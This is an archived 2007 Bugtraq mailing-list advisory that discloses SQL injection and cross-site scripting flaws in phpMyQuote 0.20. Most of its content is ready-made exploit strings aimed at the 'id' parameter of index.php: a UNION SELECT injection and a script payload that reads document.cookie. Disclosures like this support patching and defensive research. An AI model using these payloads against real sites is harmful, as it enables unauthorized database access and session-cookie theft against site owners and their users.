phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities
From: yollubunlar@xxxxxxxxxxxxxxx
Date: 9 Sep 2007 01:26:56 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

///////////////  Yollubunlar.org /////////////// 

title: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

Author : Yollubunlar.Org

Orginal Article: 
http://yollubunlar.org/phpmyquote-020-version-multiple-sql-and-xss-vulnerabilities-3501.html

MainPage: http://yollubunlar.org/category/web-security

mail : yollubunlar@xxxxxxxxxxxxxxx

Exploit Sql : http://site.com/script_path/index.php?action=edit&id=[Sql 
injction]

Example : /index.php?action=edit&id=-1%20union%20select%200,1,2,3,4,5/*

Exploit Xss 
:http://site.com/script_path/index.php?action=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

///////////////  Yollubunlar.org ///////////////

Prev by Date: Netjuke 1.0-rc2 - sql injection & XSS
Next by Date: Proxy Anket v3.0.1 Sql injection Vulnerable
Previous by thread: Netjuke 1.0-rc2 - sql injection & XSS
Next by thread: Proxy Anket v3.0.1 Sql injection Vulnerable
Index(es):
- Date
- Thread